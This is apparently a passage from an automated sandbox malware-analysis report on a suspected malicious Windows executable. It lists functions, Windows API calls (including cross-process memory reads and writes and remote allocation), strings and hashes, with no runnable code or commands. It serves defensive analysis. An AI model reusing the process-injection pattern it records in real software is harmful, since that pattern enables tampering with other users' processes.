                                                                                      • Instruction Fuzzy Hash: D6011732D01629DBCF00ABE5D899BEDBB78BF0E701F004596EA16B2251CB349655CBA1
                                                                                      APIs
                                                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C71114
                                                                                      • GetLastError.KERNEL32(?,00000000,00000000,?,?,00C70B9B,?,?,?), ref: 00C71120
                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C70B9B,?,?,?), ref: 00C7112F
                                                                                      • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C70B9B,?,?,?), ref: 00C71136
                                                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C7114D
                                                                                      Similarity
                                                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                      • String ID:
                                                                                      • API String ID: 842720411-0
                                                                                      • Opcode ID: 44d01111d23d7106b58d3e67612ab5314162627c8dec4f164e52cf41d2c5e68c
                                                                                      • Instruction ID: ff8d790bba3247bf815beb54ce1f44f01da9292ad32f034bfd7dcd0b6041220c
                                                                                      • Opcode Fuzzy Hash: 44d01111d23d7106b58d3e67612ab5314162627c8dec4f164e52cf41d2c5e68c
                                                                                      • Instruction Fuzzy Hash: 54011975200205BFDB114FA9DC89B6E3B6EEF8A3A4B644419FA45D7360DA31DD109A60
                                                                                      APIs
                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C70FCA
                                                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C70FD6
                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C70FE5
                                                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C70FEC
                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C71002
                                                                                      Similarity
                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                      • String ID:
                                                                                      • API String ID: 44706859-0
                                                                                      • Opcode ID: c5c51e00411270c52d295d2499a871057943dbe585881e6fe411e4c1b0c740ca
                                                                                      • Instruction ID: 0413710c090de4d678ba7d218d2809fc4356613b905069b55a6431b558c9d188
                                                                                      • Opcode Fuzzy Hash: c5c51e00411270c52d295d2499a871057943dbe585881e6fe411e4c1b0c740ca
                                                                                      • Instruction Fuzzy Hash: F6F04935200301AFDB214FA89C89F9A3BADEF8A766F144414FA49C7251DE70DC508A60
                                                                                      APIs
                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C7102A
                                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C71036
                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C71045
                                                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C7104C
                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C71062
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                      • String ID:
                                                                                      • API String ID: 44706859-0
                                                                                      • Opcode ID: cf7a583c2cbfc6dad122758e9660c36bdc6152b19820f59e80ea34dccf2a7663
                                                                                      • Instruction ID: f3cc19f1bd147346447bacb805fd39bfc7da7f92b008879763cb19203e3440df
                                                                                      • Opcode Fuzzy Hash: cf7a583c2cbfc6dad122758e9660c36bdc6152b19820f59e80ea34dccf2a7663
                                                                                      • Instruction Fuzzy Hash: B7F06D35200301FBDB215FA8EC89F9A3BADEF8A765F144414FE49C7250DE70D9508A60
                                                                                      APIs
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00C8017D,?,00C832FC,?,00000001,00C52592,?), ref: 00C80324
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00C8017D,?,00C832FC,?,00000001,00C52592,?), ref: 00C80331
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00C8017D,?,00C832FC,?,00000001,00C52592,?), ref: 00C8033E
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00C8017D,?,00C832FC,?,00000001,00C52592,?), ref: 00C8034B
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00C8017D,?,00C832FC,?,00000001,00C52592,?), ref: 00C80358
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00C8017D,?,00C832FC,?,00000001,00C52592,?), ref: 00C80365
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2962429428-0
                                                                                      • Opcode ID: 15bc48ef4fc0762d5dbef3ef42710a45e58db3678c8162e4c127d493377dd3e4
                                                                                      • Instruction ID: 2a60ff37e9850cc93963563cb14e4113a762db26c58cf2a8275f37eb79bb5b52
                                                                                      • Opcode Fuzzy Hash: 15bc48ef4fc0762d5dbef3ef42710a45e58db3678c8162e4c127d493377dd3e4
                                                                                      • Instruction Fuzzy Hash: 30019072801B159FCB30AF66D880416F7F5BF602193258A3ED1A652931C771AA58DF84
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 00C4D752
                                                                                        • Part of subcall function 00C429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00C4D7D1,00000000,00000000,00000000,00000000,?,00C4D7F8,00000000,00000007,00000000,?,00C4DBF5,00000000), ref: 00C429DE
                                                                                        • Part of subcall function 00C429C8: GetLastError.KERNEL32(00000000,?,00C4D7D1,00000000,00000000,00000000,00000000,?,00C4D7F8,00000000,00000007,00000000,?,00C4DBF5,00000000,00000000), ref: 00C429F0
                                                                                      • _free.LIBCMT ref: 00C4D764
                                                                                      • _free.LIBCMT ref: 00C4D776
                                                                                      • _free.LIBCMT ref: 00C4D788
                                                                                      • _free.LIBCMT ref: 00C4D79A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 776569668-0
                                                                                      • Opcode ID: defb73ef8943c9e2dfaf6213f52cf4238d4ed9aa37333cc01ba136eee1ebf9a0
                                                                                      • Instruction ID: 8059b41ae8f84a4d39d99ac8b9141c427788b722ee677d237092993823095de5
                                                                                      • Opcode Fuzzy Hash: defb73ef8943c9e2dfaf6213f52cf4238d4ed9aa37333cc01ba136eee1ebf9a0
                                                                                      • Instruction Fuzzy Hash: CDF09032541205AB8621FB69F9C2E1A7BDDBB04320BE40C06F05AE7546CB30FC80DA60
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00C75C58
                                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00C75C6F
                                                                                      • MessageBeep.USER32(00000000), ref: 00C75C87
                                                                                      • KillTimer.USER32(?,0000040A), ref: 00C75CA3
                                                                                      • EndDialog.USER32(?,00000001), ref: 00C75CBD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                      • String ID:
                                                                                      • API String ID: 3741023627-0
                                                                                      • Opcode ID: 00d179fba3f3835c3bc3a8e705b708139bbe7e48329188c35ddf770ca150daba
                                                                                      • Instruction ID: 79400189d0d61fe3c6fe03756fa5865c5029b728fa854ac18697ca79ea441419
                                                                                      • Opcode Fuzzy Hash: 00d179fba3f3835c3bc3a8e705b708139bbe7e48329188c35ddf770ca150daba
                                                                                      • Instruction Fuzzy Hash: F401A430500B04ABEB219B11DD8EFEA77B8BF05B09F044559B597A20E1DBF0AA84CB90
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 00C422BE
                                                                                        • Part of subcall function 00C429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00C4D7D1,00000000,00000000,00000000,00000000,?,00C4D7F8,00000000,00000007,00000000,?,00C4DBF5,00000000), ref: 00C429DE
                                                                                        • Part of subcall function 00C429C8: GetLastError.KERNEL32(00000000,?,00C4D7D1,00000000,00000000,00000000,00000000,?,00C4D7F8,00000000,00000007,00000000,?,00C4DBF5,00000000,00000000), ref: 00C429F0
                                                                                      • _free.LIBCMT ref: 00C422D0
                                                                                      • _free.LIBCMT ref: 00C422E3
                                                                                      • _free.LIBCMT ref: 00C422F4
                                                                                      • _free.LIBCMT ref: 00C42305
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 776569668-0
                                                                                      • Opcode ID: 0a0586d1d3f7f103e70acfd57ec8bbbae2bc40712f664e8eb7d0c05fd380f512
                                                                                      • Instruction ID: 66c842e4adb97cf9d2489d04107457dd67596ea345800028d12b437593d7d792
                                                                                      • Opcode Fuzzy Hash: 0a0586d1d3f7f103e70acfd57ec8bbbae2bc40712f664e8eb7d0c05fd380f512
                                                                                      • Instruction Fuzzy Hash: ECF05E708011A19B9A22AF95BC83B0C3B68F728770794050BF810DE2B1C7715962FFE4
                                                                                      APIs
                                                                                      • EndPath.GDI32(?), ref: 00C295D4
                                                                                      • StrokeAndFillPath.GDI32(?,?,00C671F7,00000000,?,?,?), ref: 00C295F0
                                                                                      • SelectObject.GDI32(?,00000000), ref: 00C29603
                                                                                      • DeleteObject.GDI32 ref: 00C29616
                                                                                      • StrokePath.GDI32(?), ref: 00C29631
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                      • String ID:
                                                                                      • API String ID: 2625713937-0
                                                                                      • Opcode ID: e6d2a022b37d685a43a42dafe7ba8c0cf91592e152d7d9d54f808c2efe3252e3
                                                                                      • Instruction ID: 66c4a864678db802bce69f763be00c7b36f9d01d7e6a2709e031545fcc17929b
                                                                                      • Opcode Fuzzy Hash: e6d2a022b37d685a43a42dafe7ba8c0cf91592e152d7d9d54f808c2efe3252e3
                                                                                      • Instruction Fuzzy Hash: 60F03C30005244EBDB125F65ED9C7AC3BA1EB02326F088224F9255A4F2CB348AA1DF20
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: __freea$_free
                                                                                      • String ID: a/p$am/pm
                                                                                      • API String ID: 3432400110-3206640213
                                                                                      • Opcode ID: ffd513e567bdef884e48b25a0bd0795b0b8efa3f593113199d7ad124c9021967
                                                                                      • Instruction ID: 4215e8cc08471393e90bb90a8fec2391b4cc92512362a0e15fc1e021f168f297
                                                                                      • Opcode Fuzzy Hash: ffd513e567bdef884e48b25a0bd0795b0b8efa3f593113199d7ad124c9021967
                                                                                      • Instruction Fuzzy Hash: 83D10331A10246CADB289F69C855BFEBBB0FF05710F2C4119EDA1AB661D3759EC0CB91
                                                                                      APIs
                                                                                        • Part of subcall function 00C30242: EnterCriticalSection.KERNEL32(00CE070C,00CE1884,?,?,00C2198B,00CE2518,?,?,?,00C112F9,00000000), ref: 00C3024D
                                                                                        • Part of subcall function 00C30242: LeaveCriticalSection.KERNEL32(00CE070C,?,00C2198B,00CE2518,?,?,?,00C112F9,00000000), ref: 00C3028A
                                                                                        • Part of subcall function 00C19CB3: _wcslen.LIBCMT ref: 00C19CBD
                                                                                        • Part of subcall function 00C300A3: __onexit.LIBCMT ref: 00C300A9
                                                                                      • __Init_thread_footer.LIBCMT ref: 00C97BFB
                                                                                        • Part of subcall function 00C301F8: EnterCriticalSection.KERNEL32(00CE070C,?,?,00C28747,00CE2514), ref: 00C30202
                                                                                        • Part of subcall function 00C301F8: LeaveCriticalSection.KERNEL32(00CE070C,?,00C28747,00CE2514), ref: 00C30235
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                      • String ID: 5$G$Variable must be of type 'Object'.
                                                                                      • API String ID: 535116098-3733170431
                                                                                      • Opcode ID: 2f669c1ffb87e24239e5a953aa95a09cecfe06abe10cfda80ee3bca22ac2e400
                                                                                      • Instruction ID: 47940d927af1ffd3b063b5325eebaee9b2d956505bdac81f2749d2712eb2beef
                                                                                      • Opcode Fuzzy Hash: 2f669c1ffb87e24239e5a953aa95a09cecfe06abe10cfda80ee3bca22ac2e400
                                                                                      • Instruction Fuzzy Hash: BA91BA71A15209EFCF04EF94C8999ADB7B1FF49304F108159F816AB292DB31AE81EB50
                                                                                      APIs
                                                                                        • Part of subcall function 00C7B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C721D0,?,?,00000034,00000800,?,00000034), ref: 00C7B42D
                                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C72760
                                                                                        • Part of subcall function 00C7B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C721FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00C7B3F8
                                                                                        • Part of subcall function 00C7B32A: GetWindowThreadProcessId.USER32(?,?), ref: 00C7B355
                                                                                        • Part of subcall function 00C7B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C72194,00000034,?,?,00001004,00000000,00000000), ref: 00C7B365
                                                                                        • Part of subcall function 00C7B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C72194,00000034,?,?,00001004,00000000,00000000), ref: 00C7B37B
                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C727CD
                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C7281A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                      • String ID: @
                                                                                      • API String ID: 4150878124-2766056989
                                                                                      • Opcode ID: e4fec153c75e038a8380873b3ae54fe67aeaaffa9ee466d122e5e3eb61e1f8a6
                                                                                      • Instruction ID: b2d28a0531a3230f6ece25e137f0c2d5d4ed08069f3e59f59f9495ceeba29fe2
                                                                                      • Opcode Fuzzy Hash: e4fec153c75e038a8380873b3ae54fe67aeaaffa9ee466d122e5e3eb61e1f8a6
                                                                                      • Instruction Fuzzy Hash: 70411D72900218AFDB10DBA4CD85BDEBBB8AF05700F108095FA59B7191DB716F85DBA1
                                                                                      APIs
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\BP-50C26_20241220_082241.exe,00000104), ref: 00C41769
                                                                                      • _free.LIBCMT ref: 00C41834
                                                                                      • _free.LIBCMT ref: 00C4183E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$FileModuleName
                                                                                      • String ID: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe
                                                                                      • API String ID: 2506810119-4191354773
                                                                                      • Opcode ID: 60b0ae86e996e5c41a4bef042ade8e5841648a69fc9cdf8007a25c28d73a684b
                                                                                      • Instruction ID: 822b92ce9563a0c3a8b11bb7eace1235aa42da7108b81c156af849da92989621
                                                                                      • Opcode Fuzzy Hash: 60b0ae86e996e5c41a4bef042ade8e5841648a69fc9cdf8007a25c28d73a684b
                                                                                      • Instruction Fuzzy Hash: 1A318D71A00258ABDB21DF9ADC81E9EBBFCFB85310B194166FD549B251D6708A80DBA0
                                                                                      APIs
                                                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00C7C306
                                                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00C7C34C
                                                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00CE1990,0125EBC0), ref: 00C7C395
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$Delete$InfoItem
                                                                                      • String ID: 0
                                                                                      • API String ID: 135850232-4108050209
                                                                                      • Opcode ID: d6786e713ae31df4c45ab18f47acefae11e0496939eadcde5b214afc9197d7d0
                                                                                      • Instruction ID: 283ec29dc1ff6d14d4f91d1f56df2398ed108f48e0decdf29a9ffedb7902109d
                                                                                      • Opcode Fuzzy Hash: d6786e713ae31df4c45ab18f47acefae11e0496939eadcde5b214afc9197d7d0
                                                                                      • Instruction Fuzzy Hash: E9419F712043029FD720DF25D8C4B9ABBE8AF85324F14CA1DF9A9972E1D730E904DB62
                                                                                      APIs
                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00CACC08,00000000,?,?,?,?), ref: 00CA44AA
                                                                                      • GetWindowLongW.USER32 ref: 00CA44C7
                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00CA44D7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Long
                                                                                      • String ID: SysTreeView32
                                                                                      • API String ID: 847901565-1698111956
                                                                                      • Opcode ID: 2cbc6f3cb31ee3d1ac85d592d30721fb79e40830d1655eeed6da7c5ea3b57530
                                                                                      • Instruction ID: 13f27307429f8300f17e72fd810abf7ca87c7068a955f46f006db778f1ea0a93
                                                                                      • Opcode Fuzzy Hash: 2cbc6f3cb31ee3d1ac85d592d30721fb79e40830d1655eeed6da7c5ea3b57530
                                                                                      • Instruction Fuzzy Hash: B8319E31210606AFDB248F78DC85BEA77A9EB4A338F204725F975931E0D7B0ED509B50
                                                                                      APIs
                                                                                        • Part of subcall function 00C9335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00C93077,?,?), ref: 00C93378
                                                                                      • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C9307A
                                                                                      • _wcslen.LIBCMT ref: 00C9309B
                                                                                      • htons.WSOCK32(00000000,?,?,00000000), ref: 00C93106
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                      • String ID: 255.255.255.255
                                                                                      • API String ID: 946324512-2422070025
                                                                                      • Opcode ID: 6700053ab4bd15b74e2493be6521c353358a1ffcf813e85e28bc72f9b46bd0ce
                                                                                      • Instruction ID: 7c72c338673c71e96cb1f925612ae64421c5fc31e1430f612b9f0be7181cb01f
                                                                                      • Opcode Fuzzy Hash: 6700053ab4bd15b74e2493be6521c353358a1ffcf813e85e28bc72f9b46bd0ce
                                                                                      • Instruction Fuzzy Hash: 5B31B2352002819FCF20CF69C589AAA77E0EF55318F248059E9258B3A2D731EF45C760
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00CA4705
                                                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00CA4713
                                                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00CA471A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
